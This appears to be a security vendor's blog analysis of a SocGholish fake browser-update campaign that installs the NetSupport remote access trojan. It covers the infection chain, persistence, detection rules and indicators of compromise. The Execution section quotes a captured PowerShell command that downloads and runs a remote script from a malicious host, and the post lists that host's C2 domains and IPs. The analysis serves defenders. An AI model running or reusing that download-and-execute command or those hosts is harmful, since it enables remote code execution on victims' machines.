NetSupport Remote Access Trojan (RAT) delivered through fake browser updates by SocGholish threat actors

The SocGholish campaign is suspected to be linked to the Russian threat actor known as “Evil Corp”. The threat actors are known to drop HTML…

OpenText Security Cloud Team  profile picture
OpenText Security Cloud Team

August 24, 20224 minute read

The SocGholish campaign is suspected to be linked to the Russian threat actor known as “Evil Corp”. The threat actors are known to drop HTML code into outdated or vulnerable websites. When a user visits the compromised website, the code generates a pop-up within the browser attempting to trick the user into believing their browser is outdated. If a user is enticed to believe their browser is outdated, clicking the “Update” link causes the download of an archive file containing a malicious JavaScript. After the JavaScript is executed, additional malware is downloaded and installed on the user’s computer.

Infection chain

Compromised Site [Redacted] – Drive-by
casting.faeryfox[.]com – SocGholish Command and Control (C2)
aeoi[.]pl/21.ico – NetSupport RAT Download Site
94.158.247[.]32/fakeurl.htm – NetSupport RAT C2

The image is a screenshot showing PCAP traffic observed during infection.
Shown above: PCAP traffic observed during infection.

Initial access (drive-by)

Initial access was obtained when the user browsed to the compromised site hosting the injected HTML code.

The screenshot shows obfuscated HTML code injected into compromised site which redirects visitors to Fake-Browser Update page.
Shown above: Obfuscated HTML code injected into compromised site which redirects visitors to Fake-Browser Update page
The screenshot shows a Fake Browser Update page enticing user to download archive file containing malicious JavaScript.
Shown above: Fake Browser Update page enticing user to download archive file containing malicious JavaScript

Execution

The execution stage was obtained when the user was tricked into downloading and executing the JavaScript within the downloaded archive file. The JavaScript was executed using the Windows Wscript process. The JavaScript contained obfuscated code which calls the Windows PowerShell process to connect with the download site and execute an additional PowerShell script.

Parent Process: C:\Windows\System32\wscript.exe
Child Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -w h -c “iwr -usebasicparsing https://aeoi.pl/21.ico |iex”

PowerShell Module Logs: CommandInvocation(Invoke-WebRequest): “Invoke-WebRequest” ParameterBinding(Invoke-WebRequest): name=”UseBasicParsing”; value=”True” ParameterBinding(Invoke-WebRequest): name=”Uri”; value=”https://aeoi.pl/21.ico” CommandInvocation(Invoke-Expression): “Invoke-Expression”

The screenshot shows a PowerShell user agent from infected host and PowerShell script hosted on download site
Shown above: PowerShell user agent from infected host and PowerShell script hosted on download site
The screenshot shows a Partial PowerShell script used to install and rename NetSupport RAT client.
Shown above: Partial PowerShell script used to install and rename NetSupport RAT client
This screenshot shows the File download and installed associated with the NetSupport RAT.
Shown above: File download and installed associated with the NetSupport RAT
The screenshot displays code that shows after installation NetSupport attempts to identify the user’s geo-location
Shown above: After installation NetSupport attempts to identify the user’s geo-location
Screenshot displays NetSupport client metadata showing original name after renaming
Shown above: NetSupport client metadata showing original name after renaming

Persistence

Persistence was obtained by the PowerShell script hosted on the download site. The script created a registry key to run at startup.

Screen shots displays the Registry Key created to start renamed NetSupport client whost.exe
Shown above: Registry Key created to start renamed NetSupport client whost.exe

Command and control

The screenshot displays C2 network communications from infected host to NetSupport RAT
Shown above: C2 network communications from infected host to NetSupport RAT

OpenText custom content to identify NetSupport RAT behaviours

Sigma rules

The screenshot shows the Sigma Rule used to detect process behavior associated with the NetSupport RAT
Shown above: Sigma Rule used to detect process behavior associated with the NetSupport RAT
The screenshot shows the Sigma Rule used to detect PowerShell Module Script behavior associated with the NetSupport RAT.
Shown above: Sigma Rule used to detect PowerShell Module Script behavior associated with the NetSupport RAT

Snort rules

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”OpenText – Windows Powershell User-Agent”; flow:established,to_server; content:”User-Agent|3a 20|Mozilla/”; content:”) WindowsPowerShell/”; http_header; classtype:not-suspicious; sid:20228161; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”OpenText – NetSupport GeoLocation Lookup”; flow:established,to_server; content:”Host|3a 20|geo.netsupportsoftware.com|0d 0a|”; http_header; content:”GET”; http_method; content:”/location/loca.asp”; http_uri; sid:20228162; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET 443 (msg:”OpenText – NetSupport RAT POST Request”; flow:established,to_server; content:”POST”; content:”User-Agent|3A 20|NetSupport Manager/”; nocase; sid:20228163; rev:1;)

Indicators of compromise

SHA-256 Hash: 520b8a64a11fdfb63d584e11ec1355cba6943cf102501fe4670c6429cdc13a61 – Сhrome.Updаte.zip
https://www.virustotal.com/gui/file/520b8a64a11fdfb63d584e11ec1355cba6943cf102501fe4670c6429cdc13a61/details

SHA-256 Hash: 1455c4250fea9a6a589ea23a60e130ab3f414a510d63cbf4eaf5693012d6272d – AutoUpdater.js  https://www.virustotal.com/gui/file/1455c4250fea9a6a589ea23a60e130ab3f414a510d63cbf4eaf5693012d6272d/details

SHA-256 Hash: b6b51f4273420c24ea7dc13ef4cc7615262ccbdf6f5e5a49dae604ec153055ad – client32.exe
https://www.virustotal.com/gui/file/b6b51f4273420c24ea7dc13ef4cc7615262ccbdf6f5e5a49dae604ec153055ad/details

MITRE ATT&CK techniques observed

T1189 Drive-by Compromise
T1059.007 JavaScript
T1059.001 PowerShell
T1547.001 Registry Run Keys / Startup Folder
T1140 Deobfuscate/Decode Files or Information
T1219 Remote Access Software

Maintaining system protection

The OpenTextTM Security Services team uses their extensive experience to identify an organization’s security risks and work with them to keep systems protected, offering multiple services to address cybersecurity and privacy objectives. Contact us for more information.

Author: Lenny Conway, Lead Consultant

Share this post

Share this post to x. Share to linkedin. Mail to
OpenText Security Cloud Team avatar image

OpenText Security Cloud Team

See all posts

More from the author

Dissecting IcedID behavior on an infected endpoint

Dissecting IcedID behavior on an infected endpoint

IcedID, also known as BokDot, is a banking trojan that was first discovered in 2017. It targets a victim’s financial information and it is also…

March 30, 2023 4 minute read

Technology meets tenacity

Technology meets tenacity

Technology alone won’t defeat cybercriminals. Effective cybersecurity isn’t something you buy off the shelf, set, and forget. To secure your data, you must be proactive,…

November 03, 2022 4 minute read

OpenText MxDR platform: a team player

OpenText MxDR platform: a team player

There’s a truism in the cybersecurity sector that says enterprise technology stacks are so large because the market demanded big-stack solutions. Convenience, fiscal constraints, and…

November 01, 2022 3 minute read

Stay in the loop!

Get our most popular content delivered monthly to your inbox.